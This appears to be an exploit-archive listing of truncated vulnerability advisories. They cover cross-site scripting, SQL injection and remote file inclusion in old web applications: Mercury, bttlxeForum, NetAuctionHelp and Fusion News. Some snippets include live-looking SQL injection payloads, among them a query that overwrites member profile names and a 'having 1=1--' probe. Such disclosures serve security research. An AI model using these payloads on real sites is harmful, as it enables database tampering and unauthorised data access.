Mercury v1.1.5 Send Message Cross-Site Scripting

Aria-Security Team Persian Security Network http://Aria-Security.Net --------------------------------------------- Greetz: Aura, imm02tal, iM4n, Mormoroth, Mercury v1.1.5 Send Message Cross-Site Scripting In order to make this vuln work you need to place your code in the "message text" area and...

bttlxeForum Multiple SQL Injection And Cross Site Scripting

Aria-Security Team http://Aria-Security.Net ----------------------------- Discovered By: Mormoroth Shout outs The-0utlaw for completing the vuln. I.SQL Injection http://site.ltd/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';-- This Changes MemberList...

nah-sql.txt

Aria-Security Net Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099 ------------------------ Vendor: http://www.netauctionhelp.com PoC: search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=SQL INJECTION...

NetAuctionHelp 4.1 (nsearch) Remote SQL Injection Vulnerability

No description provided by source. Aria-Security Net http://Aria-Security.Net ------------------------ Vendor: http://www.netauctionhelp.com PoC: search.asp ?sort=ni&category=&categoryname=&kwsearch=&nsearch=SQL INJECTION search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--...

NetAuctionHelp 4.1 - 'nsearch' SQL Injection

Aria-Security Net http://Aria-Security.Net ------------------------ Vendor: http://www.netauctionhelp.com PoC: search.asp ?sort=ni&category=&categoryname=&kwsearch=&nsearch=SQL INJECTION search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--...

Fusionphp Fusion News 3.7 - index.php Remote File Inclusion

Fusionphp Fusion News 3.7 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/19546/info Fusion News is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote...